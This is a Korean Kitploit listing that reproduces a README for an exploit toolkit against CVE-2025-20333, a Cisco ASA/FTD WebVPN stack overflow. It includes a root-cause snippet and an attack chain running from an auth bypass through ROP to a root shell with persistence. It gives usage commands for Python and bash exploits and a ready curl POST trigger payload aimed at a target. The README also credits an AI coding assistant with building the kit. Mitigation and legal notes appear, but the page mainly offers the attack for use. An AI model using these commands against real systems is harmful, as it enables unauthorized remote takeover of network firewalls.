Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-20333 — CVE-2025-20333(Cisco ASA/FTD WebVPN의 치명적인 스택 버퍼 오버플로)을 위한 완전한 연구 및 익스플로잇 툴킷입니다. 상세한 바이너리 분석, Python 및 bash 기반 PoC 익스플로잇, 그리고 익스플로잇 가이드를 포함합니다. | Kitploit
도구/GitHubGitHub/cobbbex/cve-2025-20333
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingBinary Exploitation
GitHubcobbbex/cve-2025-20333

cve-2025-20333

CVE-2025-20333(Cisco ASA/FTD WebVPN의 치명적인 스택 버퍼 오버플로)을 위한 완전한 연구 및 익스플로잇 툴킷입니다. 상세한 바이너리 분석, Python 및 bash 기반 PoC 익스플로잇, 그리고 익스플로잇 가이드를 포함합니다.

저장소 보기
10시간 31분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-20333 - 종합 연구 및 익스플로잇 툴킷

개요

이 디렉토리에는 CVE-2025-20333에 대한 종합적인 연구, 분석 및 개념 증명 코드가 포함되어 있습니다. 이는 Cisco ASA/FTD WebVPN 서버의 치명적인 스택 버퍼 오버플로 취약점입니다.

상태: ⚠️ 실제 환경에서 적극적으로 악용됨 (ArcaneDoor 캠페인)
CVSS 점수: 9.8 치명적
인증: 불필요 (CVE-2025-20362를 통해 우회)
영향: 루트 권한으로 원격 코드 실행


목차

📚 문서

CVE-2025-20333-RESEARCH-NOTES.md (20 KB)

완전한 리버스 엔지니어링 연구

  • 취약점 컨텍스트 및 웹 인텔리전스
  • 바이너리 분석 (ASA 9.12.4.x lina 프로세스)
  • 요청 수집 계층 감사
  • Lua API 바인딩 분석
  • 🎯 오버플로 발견 (body_lexer.re2c, FUN_0302e690)
  • 공격 체인 분석
  • 코드 패턴을 통한 근본 원인 분석
  • 도구 및 주소 참조 테이블
  • 핵심 발견:

    root@kitploit:~
    body_lexer.re2c의 고정 16바이트 버퍼 (local_58[16])
    URL 디코딩 루프에 경계 검사가 없음
    iVar11 < 16을 확인하지 않고 local_58[iVar11]에 쓰기
    8개의 16진수 쌍 이후: 오버플로 → 스택 손상 → RCE
    

    EXPLOITATION-GUIDE.md (12 KB)

    실전 익스플로잇 매뉴얼

    • 취약점 메커니즘 설명
    • 완전한 공격 체인 (CVE-2025-20362 우회 + 오버플로)
    • 단계별 익스플로잇 워크스루
    • 페이로드 제작 기법
    • 네트워크 기반 탐지 방법
    • 호스트 기반 탐지 및 로그 분석
    • 완화 전략
    • 패치 버전 및 업그레이드 경로
    • 법적 및 윤리적 고려사항

    🔧 개념 증명 익스플로잇

    cve-2025-20333-poc.py (15 KB)

    모든 기능을 갖춘 Python 익스플로잇

    기능:

    • 자동 페이로드 생성
    • CVE-2025-20362 경로 탐색 통합
    • ROP 가젯 체인 구성
    • SSL/TLS 지원
    • 구성 가능한 타임아웃
    • 상세 진행 보고

    사용법:

    root@kitploit:~
    # 취약점 세부 정보 표시
    python3 cve-2025-20333-poc.py --details
    
    # 대상 익스플로잇
    python3 cve-2025-20333-poc.py 192.168.1.100 443
    
    # 사용자 지정 설정
    python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30
    

    cve-2025-20333-poc.sh (8.5 KB)

    경량 bash 익스플로잇

    기능:

    • Python 의존성 없음
    • curl 또는 netcat 사용
    • 최소 리소스 사용
    • 교육용 주석
    • 명확한 상태 출력

    사용법:

    root@kitploit:~
    # 세부 정보 표시
    ./cve-2025-20333-poc.sh --details
    
    # 익스플로잇
    ./cve-2025-20333-poc.sh 192.168.1.100 443 10
    
    # curl로 수동 실행
    curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
      -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure
    

    취약점 요약

    빠른 사실

    속성값
    CVE IDCVE-2025-20333
    유형스택 버퍼 오버플로 (CWE-120)
    구성 요소body_lexer.re2c (FUN_0302e690)
    영향받는 버전ASA 9.16–9.23, FTD 7.0–7.7
    CVSS v3.19.8 (치명적)
    인증불필요 (CVE-2025-20362 경유)
    사용자 상호작용없음
    영향루트 권한 RCE, 전체 시스템 손상
    상태적극적으로 악용됨 (2025년 5월 이후)
    책임 있는 공개Cisco 패치 완료, 권고 게시됨

    근본 원인

    root@kitploit:~
    // body_lexer.re2c - URL 디코딩 루프
    byte local_58[16];  // ← 고정 16바이트 버퍼
    
    while (parsing_request_body) {
        byte input = *data++;
        
        if (input == '%') {
            hex_decode_mode = true;
            hex_index = 0;
        }
        
        if (hex_decode_mode) {
            local_58[hex_index] = input;  // ← 경계 검사 없음!
            hex_index++;
            
            if (hex_index == 2) {
                byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
                hex_decode_mode = false;
            }
        }
    }
    

    오버플로 트리거: POST 본문의 9개 이상의 연속된 %XX 시퀀스

    공격 체인

    root@kitploit:~
    1. 공격자 (인증 불필요)
       ↓
    2. /+CSCOU+/../+CSCOE+/files/file_list.json으로 HTTP POST
       ├─ CVE-2025-20362: 경로 탐색으로 인증 검사 우회
       └─ files_retr.lua 엔드포인트 도달 (auth_flag = 0)
       ↓
    3. POST 본문: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
       (9개 이상의 URL 인코딩 쌍)
       ↓
    4. body_lexer.re2c가 POST 본문 처리
       ├─ 16진수 쌍을 local_58[16]에 누적
       └─ 8개 쌍 이후: 오버플로!
       ↓
    5. 스택 손상
       ├─ local_48, local_40 덮어쓰기
       ├─ 저장된 RBP 덮어쓰기
       └─ 저장된 RIP (반환 주소) 덮어쓰기
       ↓
    6. 제어 흐름 탈취
       ├─ RIP가 ROP 가젯을 가리킴
       ├─ ROP 체인이 execve() 설정
       └─ execve("/bin/sh", NULL, NULL)
       ↓
    7. 루트 권한 RCE (lina 프로세스는 루트로 실행)
       ├─ 전체 VPN 서버 손상
       ├─ 모든 VPN 트래픽 접근
       └─ NVRAM 수정을 통한 지속성 확보
    

    연구 프로세스

    1단계: 바이너리 분석 ✅

    • Ghidra에서 lina 바이너리 열기
    • WebVPN 요청 아키텍처 매핑 (HTTP 파서, URL 라우터, 13개 엔드포인트 훅)
    • 요청 수집 계층 감사 (모두 clString/정확한 크기 할당으로 안전)
    • Lua API 바인딩 검토 (모두 안전)

    2단계: 웹 인텔리전스 ✅

    • CVE-2025-20333 기술 세부 정보 검색
    • Rapid7, Zscaler, Horizon3, Tenable 분석 확인
    • 공격 체인이 /+CSCOU+/../+CSCOE+/files/file_list.json 사용 확인
    • 근본 원인 식별: Lua 엔드포인트의 힙 기반 (웹 소스) / 스택 기반 (이 바이너리) 오버플로

    3단계: 표적 리버싱 ✅

    • body_lexer.re2c 디컴파일 (FUN_0302e690)
    • 발견: 경계 검사가 없는 고정 16바이트 버퍼 local_58[16]
    • 오버플로 경로 확인: URL 디코딩 루프 → 무제한 쓰기
    • 도달 가능성 검증: files_retr.lua → body_lexer → 스택 오버플로

    4단계: 익스플로잇 개발 ✅

    • ROP 체인 지원 Python PoC 생성
    • 최소 환경용 bash PoC 생성
    • 페이로드 구조 및 제작 기법 문서화
    • 탐지 및 완화 지침 포함

    사용 지침

    공인된 침투 테스트용

    1. 권한 확인

      • 테스트에 대한 서면 승인 획득
      • 대상 시스템 세부 정보 확인 (IP, 포트, 버전)
      • 범위 및 일정 문서화
    2. 익스플로잇 실행

      root@kitploit:~
      # 빠른 확인: 대상이 익스플로잇 시도에 응답하는가?
      python3 cve-2025-20333-poc.py <target_ip>
      
      # 또는 bash 버전:
      ./cve-2025-20333-poc.sh <target_ip>
      
    3. 익스플로잇 검증

      • 셸 접근 / 리버스 셸 연결 확인
      • 시스템 로그에서 충돌 또는 이상 징후 검사
      • 수정된 파일 검색 (NVRAM, 지속성 백도어)
    4. 결과 문서화

      • 대상 버전, 패치 수준 기록
      • 익스플로잇 성공/실패 문서화
      • 발견된 방어 조치 기록
      • 완화 권장사항과 함께 고객에게 보고

    보안 연구용

    1. 연구 노트 읽기

      • CVE-2025-20333-RESEARCH-NOTES.md 학습
      • 바이너리 아키텍처 및 오버플로 메커니즘 이해
    2. PoC 연구

      • ROP 가젯 구성을 위한 Python PoC 검토
      • 최소 익스플로잇용 bash PoC 검토
      • 페이로드 인코딩 이해
    3. 적응 및 확장

      • 사용자 지정 셸코드 추가
      • 다양한 익스플로잇 기법 구현
      • 패치 버전 vs 취약 버전 테스트

    중요 경고

    ⚠️ 법적 고지

    이 툴킷은 공인된 보안 테스트 전용으로 제공됩니다.

    • 금지: 명시적 서면 승인 없이 시스템에 사용
    • 금지: 악의적인 목적 (데이터 도용, 서비스 중단, 랜섬웨어)으로 사용
    • 무단 접근은 미국 컴퓨터 사기 및 남용 법안 (CFAA) 및 전 세계 유사 법률을 위반합니다
    • 처벌에는 형사 기소, 벌금, 징역이 포함됩니다

    ✅ 공인된 사용:

    • 서면 승인을 받은 침투 테스트
    • 취약점 연구 중 개념 증명
    • 내부 보안 테스트
    • CTF 대회
    • 학술 연구

    ❌ 금지된 사용:

    • 허가 없이 시스템 공격
    • 랜섬웨어 배포
    • 데이터 도용 또는 협박
    • 서비스 중단
    • 손상된 네트워크에서의 측면 이동

    파일 매니페스트

    root@kitploit:~
    cve-2025-20333/
    ├── README.md                              (이 파일)
    ├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB, 종합 연구)
    ├── EXPLOITATION-GUIDE.md                 (12 KB, 실전 가이드)
    ├── cve-2025-20333-poc.py                 (15 KB, Python PoC)
    └── cve-2025-20333-poc.sh                 (8.5 KB, bash PoC)
    

    총 문서: ~65 KB
    연구 깊이: 50개 이상의 Ghidra 함수 감사
    검증된 발견: body_lexer.re2c의 버퍼 오버플로 확인


    빠른 참조

    취약점 빠른 테스트

    root@kitploit:~
    # 대상이 익스플로잇에 취약한지 테스트
    curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
      -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
      --insecure \
      -i
    
    # 대상이 응답하면 (200, 500, 충돌), 취약할 수 있음
    # 대상이 차단/리다이렉트하면, 패치되었을 수 있음
    

    버전 확인

    root@kitploit:~
    # 취약한 버전:
    # - Cisco ASA 9.16 ~ 9.23
    # - Cisco FTD 7.0 ~ 7.7
    
    # SSH/콘솔로 ASA 버전 확인:
    show version
    
    # 패치된 버전:
    # - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
    # - FTD 7.0.x, 7.1.x, 7.2.x (패치됨)
    

    완화 체크리스트

    • ASA/FTD 버전 확인
    • 사용 가능한 패치 확인
    • 취약한 경우 패치 버전으로 업그레이드
    • IP 주소로 WebVPN 접근 제한
    • 로깅 및 모니터링 활성화
    • CVE-2025-20362 경로 탐색 시도 모니터링
    • DoS 패턴 모니터링 (lina 충돌)
    • WebVPN 포트에 방화벽 보호 활성화

    참고 자료

    • Cisco 보안 권고: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
    • Rapid7 분석: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
    • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
    • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

    면책 조항

    이 툴킷은 교육 및 공인된 테스트 목적으로만 AS-IS로 제공됩니다.

    • 사용에 따른 책임은 본인에게 있습니다
    • 오용에 대한 보증 또는 책임 없음
    • 무단 접근은 불법입니다
    • 발견 사항을 Cisco 및 영향받는 조직에 책임 있게 보고하세요
    • 해당 국가의 사이버 보안 법률을 준수하세요


    기여자

    이 프로젝트는 Anthropic의 AI 기반 코딩 어시스턴트인 Claude Code의 도움으로 개발되었습니다.


    작성일: 2026-08-23
    연구 기간: 2026-08-22 ~ 2026-08-23
    상태: 완료 및 문서화
    분류: 교육용 / 공인된 테스트 전용

    도구 다운로드